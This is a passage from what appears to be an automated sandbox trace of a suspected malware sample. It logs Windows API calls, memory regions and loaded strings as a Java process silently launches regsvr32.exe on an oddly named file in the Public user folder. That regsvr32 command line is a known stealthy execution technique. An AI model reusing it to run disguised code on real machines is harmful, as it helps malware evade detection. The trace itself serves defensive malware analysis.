dwMask=0x1, dwFlags=0x1) returned 1 [0026.519] CreatePipe (in: hReadPipe=0x4bf1e0, hWritePipe=0x4bf1e4, lpPipeAttributes=0x0, nSize=0x1018 | out: hReadPipe=0x4bf1e0*=0x2c4, hWritePipe=0x4bf1e4*=0x2c8) returned 1 [0026.519] SetHandleInformation (hObject=0x2c8, dwMask=0x1, dwFlags=0x1) returned 1 [0026.519] GetConsoleWindow () returned 0x500fc [0026.520] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="regsvr32.exe /s \\\"C:\\\\Users\\\\Public\\\\N3Eg\\\\N3Eg2.51N3E\\\" #96", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000400, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x4bf174*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x2b4, hStdOutput=0x2c0, hStdError=0x2c8), lpProcessInformation=0x4bf1b8 | out: lpCommandLine="regsvr32.exe /s \\\"C:\\\\Users\\\\Public\\\\N3Eg\\\\N3Eg2.51N3E\\\" #96", lpProcessInformation=0x4bf1b8*(hProcess=0x2d0, hThread=0x2cc, dwProcessId=0xbf8, dwThreadId=0xbfc)) returned 1 [0026.540] CloseHandle (hObject=0x2cc) returned 1 [0026.540] CloseHandle (hObject=0x2c8) returned 1 [0026.540] CloseHandle (hObject=0x2c0) returned 1 [0026.540] CloseHandle (hObject=0x2b4) returned 1 [0026.540] SetHandleInformation (hObject=0xb, dwMask=0x1, dwFlags=0x1) returned 0 [0026.540] SetHandleInformation (hObject=0x7, dwMask=0x1, dwFlags=0x1) returned 0 [0026.541] SetHandleInformation (hObject=0x3, dwMask=0x1, dwFlags=0x1) returned 0 [0026.541] strlen (_Str="java/lang/ProcessImpl$2.class") returned 0x1d [0026.541] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x32e8728, lpNewFilePointer=0x0, dwMoveMethod=0x4bea30 | out: lpNewFilePointer=0x0) returned 1 [0026.541] ReadFile (in: hFile=0xd4, lpBuffer=0xacb6a0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4bea00, lpOverlapped=0x0 | out: lpBuffer=0xacb6a0*, lpNumberOfBytesRead=0x4bea00*=0xa0, lpOverlapped=0x0) returned 1 [0026.541] strlen (_Str="java/lang/ProcessImpl$2.class") returned 0x1d [0026.542] strcpy (in: _Dest=0x4beb34, _Source="java/lang/ProcessImpl$2.class" | out: _Dest="java/lang/ProcessImpl$2.class") returned="java/lang/ProcessImpl$2.class" [0026.542] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16acea8, lpNewFilePointer=0x0, dwMoveMethod=0x4be634 | out: lpNewFilePointer=0x0) returned 1 [0026.542] ReadFile (in: hFile=0xd4, lpBuffer=0x4be66c, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be604, lpOverlapped=0x0 | out: lpBuffer=0x4be66c*, lpNumberOfBytesRead=0x4be604*=0x1e, lpOverlapped=0x0) returned 1 [0026.542] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16acee3, lpNewFilePointer=0x0, dwMoveMethod=0x4be670 | out: lpNewFilePointer=0x0) returned 1 [0026.542] ReadFile (in: hFile=0xd4, lpBuffer=0x15024e70, nNumberOfBytesToRead=0x751, lpNumberOfBytesRead=0x4be640, lpOverlapped=0x0 | out: lpBuffer=0x15024e70*, lpNumberOfBytesRead=0x4be640*=0x751, lpOverlapped=0x0) returned 1 Thread: id = 3 os_tid = 0xbc4 Thread: id = 4 os_tid = 0xbc8 Thread: id = 5 os_tid = 0xbcc Thread: id = 6 os_tid = 0xbd8 Thread: id = 7 os_tid = 0xbd0 Thread: id = 8 os_tid = 0xbd4 Thread: id = 9 os_tid = 0xbe0 Thread: id = 10 os_tid = 0xbdc Thread: id = 11 os_tid = 0xbe4 Thread: id = 12 os_tid = 0xbec [0024.677] strlen (_Str="java/util/Collections$SynchronizedRandomAccessList.class") returned 0x38 [0024.677] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x32fe41a, lpNewFilePointer=0x0, dwMoveMethod=0x155ae8f0 | out: lpNewFilePointer=0x0) returned 1 [0024.677] ReadFile (in: hFile=0xd4, lpBuffer=0xacb5f8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x155ae8c0, lpOverlapped=0x0 | out: lpBuffer=0xacb5f8*, lpNumberOfBytesRead=0x155ae8c0*=0xa0, lpOverlapped=0x0) returned 1 [0024.678] strlen (_Str="java/util/Collections$SynchronizedRandomAccessList.class") returned 0x38 [0024.678] strcpy (in: _Dest=0x155ae9f4, _Source="java/util/Collections$SynchronizedRandomAccessList.class" | out: _Dest="java/util/Collections$SynchronizedRandomAccessList.class") returned="java/util/Collections$SynchronizedRandomAccessList.class" [0024.678] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x18a23b8, lpNewFilePointer=0x0, dwMoveMethod=0x155ae4f4 | out: lpNewFilePointer=0x0) returned 1 [0024.678] ReadFile (in: hFile=0xd4, lpBuffer=0x155ae52c, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x155ae4c4, lpOverlapped=0x0 | out: lpBuffer=0x155ae52c*, lpNumberOfBytesRead=0x155ae4c4*=0x1e, lpOverlapped=0x0) returned 1 [0024.679] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x18a240e, lpNewFilePointer=0x0, dwMoveMethod=0x155ae530 | out: lpNewFilePointer=0x0) returned 1 [0024.679] ReadFile (in: hFile=0xd4, lpBuffer=0x15024e70, nNumberOfBytesToRead=0x464, lpNumberOfBytesRead=0x155ae500, lpOverlapped=0x0 | out: lpBuffer=0x15024e70*, lpNumberOfBytesRead=0x155ae500*=0x464, lpOverlapped=0x0) returned 1 [0024.680] strlen (_Str="java/util/Collections$SynchronizedList.class") returned 0x2c [0024.680] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x32fe2fc, lpNewFilePointer=0x0, dwMoveMethod=0x155ae290 | out: lpNewFilePointer=0x0) returned 1 [0024.680] ReadFile (in: hFile=0xd4, lpBuffer=0xacb5f8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x155ae260, lpOverlapped=0x0 | out: lpBuffer=0xacb5f8*, lpNumberOfBytesRead=0x155ae260*=0xa0, lpOverlapped=0x0) returned 1 [0024.680] strlen (_Str="java/util/Collections$SynchronizedList.class") returned 0x2c [0024.680] strcpy (in: _Dest=0x155ae394, _Source="java/util/Collections$SynchronizedList.class" | out: _Dest="java/util/Collections$SynchronizedList.class") returned="java/util/Collections$SynchronizedList.class" [0024.680] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x189f4ae, lpNewFilePointer=0x0, dwMoveMethod=0x155ade94 | out: lpNewFilePointer=0x0) returned 1 [0024.680] ReadFile (in: hFile=0xd4, lpBuffer=0x155adecc, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x155ade64, lpOverlapped=0x0 | out: lpBuffer=0x155adecc*, lpNumberOfBytesRead=0x155ade64*=0x1e, lpOverlapped=0x0) returned 1 [0024.681] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x189f4f8, lpNewFilePointer=0x0, dwMoveMethod=0x155aded0 | out: lpNewFilePointer=0x0) returned 1 [0024.681] ReadFile (in: hFile=0xd4, lpBuffer=0x15025470, nNumberOfBytesToRead=0xd6a, lpNumberOfBytesRead=0x155adea0, lpOverlapped=0x0 | out: lpBuffer=0x15025470*, lpNumberOfBytesRead=0x155adea0*=0xd6a, lpOverlapped=0x0) returned 1 Process: id = "2" image_name = "regsvr32.exe" filename = "c:\\windows\\system32\\regsvr32.exe" page_root = "0x7f09e3c0" os_pid = "0xbf8" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb6c" cmd_line = "regsvr32.exe /s \\\"C:\\\\Users\\\\Public\\\\N3Eg\\\\N3Eg2.51N3E\\\" #96" cur_dir = "C:\\Users\\DSsDPMx042\\Desktop\\" Region: id = 246 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 247 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 248 start_va = 0x40000 end_va = 0x41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 249 start_va = 0x200000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 250 start_va = 0x6a0000 end_va = 0x6a6fff entry_point = 0x6a27c1 region_type = mapped_file name = "regsvr32.exe" filename = "\\Windows\\System32\\regsvr32.exe" Region: id = 251 start_va = 0x77200000 end_va = 0x7733bfff entry_point = 0x77200000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 252 start_va = 0x77440000 end_va = 0x77440fff entry_point = 0x77440000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" Region: id = 253 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 254 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 255 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 256 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 257 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 258 start_va = 0xd0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 259 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 260 start_va = 0x74110000 end_va = 0x742adfff entry_point = 0x7413e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" Region: id = 261 start_va = 0x75510000 end_va = 0x75559fff entry_point = 0x75517de0 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\System32\\KernelBase.dll" Region: id = 262 start_va = 0x75900000 end_va = 0x759d3fff entry_point = 0x7594bde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" Region: id = 263 start_va = 0x76650000 end_va = 0x766effff entry_point = 0x766649e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" Region: id = 264 start_va = 0x76a90000 end_va = 0x76bebfff entry_point = 0x76adba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" Region: id = 265 start_va = 0x76bf0000 end_va = 0x76c90fff entry_point = 0x76c22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" Region: id = 266 start_va = 0x76ca0000 end_va = 0x76d68fff entry_point = 0x76cbd711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" Region: id = 267 start_va = 0x76d70000 end_va = 0x76dc6fff entry_point = 0x76d89ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" Region: id = 268 start_va = 0x76dd0000 end_va = 0x76e1dfff entry_point = 0x76dd9c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" Region: id = 269 start_va = 0x76f70000 end_va = 0x7701bfff entry_point = 0x76f7a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" Region: id = 270 start_va = 0x77020000 end_va = 0x770bcfff entry_point = 0x77053fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" Region: id = 271 start_va = 0x77350000 end_va = 0x77359fff entry_point = 0x7735136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" Region: id = 272 start_va = 0x773d0000 end_va = 0x773e8fff entry_point = 0x773d4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" Region: id = 273 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 274 start_va = 0xe0000 end_va = 0x1a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 275 start_va = 0x75830000 end_va = 0x758fbfff entry_point = 0x7583168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" Region: id = 276 start_va = 0x76630000 end_va = 0x7664efff entry_point = 0x76631355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" Region: id = 277 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 278 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 279 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x1b0000 region_type = mapped_file name = "regsvr32.exe.mui" filename = "\\Windows\\System32\\en-US\\regsvr32.exe.mui" Region: id = 280 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 281 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 282 start_va = 0x1f0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 283 start_va = 0x240000 end_va = 0x340fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 284 start_va = 0x6b0000 end_va = 0x12affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 285 start_va = 0x752a0000 end_va = 0x752abfff entry_point = 0x752a10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" Region: id = 286 start_va = 0x74090000 end_va = 0x740cffff entry_point = 0x7409a2dd region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" Region: id = 287 start_va = 0x450000 end_va = 0x52efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 288 start_va = 0x610000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 289 start_va = 0x12b0000 end_va = 0x1404fff entry_point = 0x1388670 region_type = mapped_file name = "N3Eg2.51N3E" filename = "\\Users\\Public\\N3Eg\\N3Eg2.51N3E" Region: id = 290 start_va = 0x76ee0000 end_va = 0x76f6efff entry_point = 0x76ee3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" Region: id = 291 start_va = 0x1410000 end_va = 0x154ffff entry_point = 0x0 region_type = private name = "private_0x0000000001410000" filename = "" Region: id = 651 start_va = 0x1550000 end_va = 0x181efff entry_point = 0x1550000 region_type = mapped_file name = "SortDefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" Thread: id = 13 os_tid = 0xbfc [0027.305] GetCurrentThreadId () returned 0xbfc [0027.305] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x364dd8 [0027.306] SetThreadLocale (Locale=0x400) returned 1 [0027.306] GetVersion () returned 0x1db10106 [0027.306] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75900000 [0027.307] GetProcAddress (hModule=0x75900000, lpProcName="GetThreadPreferredUILanguages") returned 0x759422d7 [0027.307] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75900000 [0027.307] GetProcAddress (hModule=0x75900000, lpProcName="SetThreadPreferredUILanguages") returned 0x7593e627 [0027.307] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75900000 [0027.307] GetProcAddress (hModule=0x75900000, lpProcName="GetThreadUILanguage") returned 0x7593ae42 [0027.307] GetSystemInfo (in: lpSystemInfo=0x23e374 | out: lpSystemInfo=0x23e374*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x1, dwNumberOfProcessors=0x1, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x2d07)) [0027.307] GetCommandLineW () returned="regsvr32.exe /s \\\"C:\\\\Users\\\\Public\\\\N3Eg\\\\N3Eg2.51N3E\\\" #96" [0027.307] GetStartupInfoW (in: lpStartupInfo=0x23e350 | out: lpStartupInfo=0x23e350*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\regsvr32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x2b4, hStdOutput=0x2c0, hStdError=0x2c8)) [0027.307] GetACP () returned 0x4e4 [0027.307] GetCurrentThreadId () returned 0xbfc [0027.307] GetVersion () returned 0x1db10106 [0027.307] GetVersionExW (in: lpVersionInformation=0x23e284*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7725f879, dwMinorVersion=0x7725f99a, dwBuildNumber=0x351c88, dwPlatformId=0x23e2ea, szCSDVersion="##⳸6#諸眥烲眥恔眤閂畑￿￿%") | out: lpVersionInformation=0x23e284*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0027.307] GetModuleFileNameW (in: hModule=0x12b0000, lpFilename=0x23c140, nSize=0x20a | out: lpFilename="C:\\Users\\Public\\N3Eg\\N3Eg2.51N3E") returned 0x20 [0027.308] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x23bf2a, nSize=0x105 | out: lpFilename="C:\\Windows\\system32\\regsvr32.exe") returned 0x20 [0027.308] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1410000 [0027.308] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x23bea4 | out: phkResult=0x23bea4*=0x0) returned 0x2 [0027.308] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x23bea4 | out: phkResult=0x23bea4*=0x0) returned 0x2 [0027.308] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x23bea4 | out: phkResult=0x23bea4*=0x0) returned 0x2 [0027.308] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x23bea4 | out: phkResult=0x23bea4*=0x0) returned 0x2 [0027.309] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x23bea4 | out: phkResult=0x23bea4*=0x0) returned 0x2 [0027.309] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x23bea4 | out: phkResult=0x23bea4*=0x0) returned 0x2 [0027.309] GetUserDefaultUILanguage () returned 0x409 [0027.309] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0027.309] GetThreadUILanguage () returned 0x230409 [0027.309] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x23be80, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x23bea8 | out: pulNumLanguages=0x23be80, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x23bea8) returned 1 [0027.309] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x23be80, pwszLanguagesBuffer=0x153a680, pcchLanguagesBuffer=0x23bea8 | out: pulNumLanguages=0x23be80, pwszLanguagesBuffer=0x153a680, pcchLanguagesBuffer=0x23bea8) returned 1 [0027.309] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg2.en-US", lpFindFileData=0x23bc50 | out: lpFindFileData=0x23bc50) returned 0xffffffff [0027.310] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg2.en", lpFindFileData=0x23bc50 | out: lpFindFileData=0x23bc50) returned 0xffffffff [0027.310] GetUserDefaultUILanguage () returned 0x409 [0027.310] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x23bec4, cchData=4 | out: lpLCData="ENU") returned 4 [0027.310] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg2.ENU", lpFindFileData=0x23bc50 | out: lpFindFileData=0x23bc50) returned 0xffffffff [0027.311] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg2.EN", lpFindFileData=0x23bc50 | out: lpFindFileData=0x23bc50) returned 0xffffffff [0027.311] LoadStringW (in: hInstance=0x12b0000, uID=0xffc8, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0027.311] LoadStringW (in: hInstance=0x12b0000, uID=0xffc7, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0027.311] LoadStringW (in: hInstance=0x12b0000, uID=0xffc6, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0027.311] LoadStringW (in: hInstance=0x12b0000, uID=0xffc5, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0027.311] LoadStringW (in: hInstance=0x12b0000, uID=0xffc4, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0027.311] LoadStringW (in: hInstance=0x12b0000, uID=0xffc3, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0027.311] LoadStringW (in: hInstance=0x12b0000, uID=0xffc1, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0027.311] LoadStringW (in: hInstance=0x12b0000, uID=0xffc2, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0027.312] LoadStringW (in: hInstance=0x12b0000, uID=0xffd0, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0027.312] LoadStringW (in: hInstance=0x12b0000, uID=0xffdd, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0027.312] LoadStringW (in: hInstance=0x12b0000, uID=0xffef, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0027.312] LoadStringW (in: hInstance=0x12b0000, uID=0xffec, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0027.312] LoadStringW (in: hInstance=0x12b0000, uID=0xffd3, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0027.312] LoadStringW (in: hInstance=0x12b0000, uID=0xffd2, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0027.312] LoadStringW (in: hInstance=0x12b0000, uID=0xffe5, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0027.312] LoadStringW (in: hInstance=0x12b0000, uID=0xffe6, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0027.312] LoadStringW (in: hInstance=0x12b0000, uID=0xffe7, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0027.312] LoadStringW (in: hInstance=0x12b0000, uID=0xffe4, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0027.312] LoadStringW (in: hInstance=0x12b0000, uID=0xffe2, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0027.312] LoadStringW (in: hInstance=0x12b0000, uID=0xffe0, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0027.313] LoadStringW (in: hInstance=0x12b0000, uID=0xffff, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0027.313] LoadStringW (in: hInstance=0x12b0000, uID=0xfffe, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0027.313] LoadStringW (in: hInstance=0x12b0000, uID=0xfffd, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0027.313] LoadStringW (in: hInstance=0x12b0000, uID=0xfffc, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0027.313] LoadStringW (in: hInstance=0x12b0000, uID=0xfffb, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0027.313] LoadStringW (in: hInstance=0x12b0000, uID=0xfffa, lpBuffer=0x23c374, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0027.313] LoadStringW (in: hInstance=0x12b0000, uID=0xfff3, lpBuffer=0x23c36c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0027.313] LoadStringW (in: hInstance=0x12b0000, uID=0xffe1, lpBuffer=0x23c36c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0027.313] GetVersionExW (in: lpVersionInformation=0x23e280*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x23e280*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0027.313] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75900000 [0027.313] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x364df8 [0027.313] GetProcAddress (hModule=0x75900000, lpProcName="GetNativeSystemInfo") returned 0x7593be77 [0027.313] GetNativeSystemInfo (in: lpSystemInfo=0x23e25c | out: lpSystemInfo=0x23e25c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x1, dwNumberOfProcessors=0x1, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x2d07)) [0027.313] LoadStringW (in: hInstance=0x12b0000, uID=0xff6b, lpBuffer=0x23c250, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0027.313] LoadStringW (in: hInstance=0x12b0000, uID=0xff6e, lpBuffer=0x23c250, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0027.314] LoadStringW (in: hInstance=0x12b0000, uID=0xfff9, lpBuffer=0x23c364, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0027.314] LoadStringW (in: hInstance=0x12b0000, uID=0xfff8, lpBuffer=0x23c364, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0027.314] LoadStringW (in: hInstance=0x12b0000, uID=0xfff7, lpBuffer=0x23c364, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0027.314] LoadStringW (in: hInstance=0x12b0000, uID=0xfff6, lpBuffer=0x23c364, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0027.314] LoadStringW (in: hInstance=0x12b0000, uID=0xfff5, lpBuffer=0x23c364, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0027.314] LoadStringW (in: hInstance=0x12b0000, uID=0xff84, lpBuffer=0x23c364, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0027.314] LoadStringW (in: hInstance=0x12b0000, uID=0xff78, lpBuffer=0x23c364, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0027.314] GetVersionExW (in: lpVersionInformation=0x23e274*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x2d070006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x23e274*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, 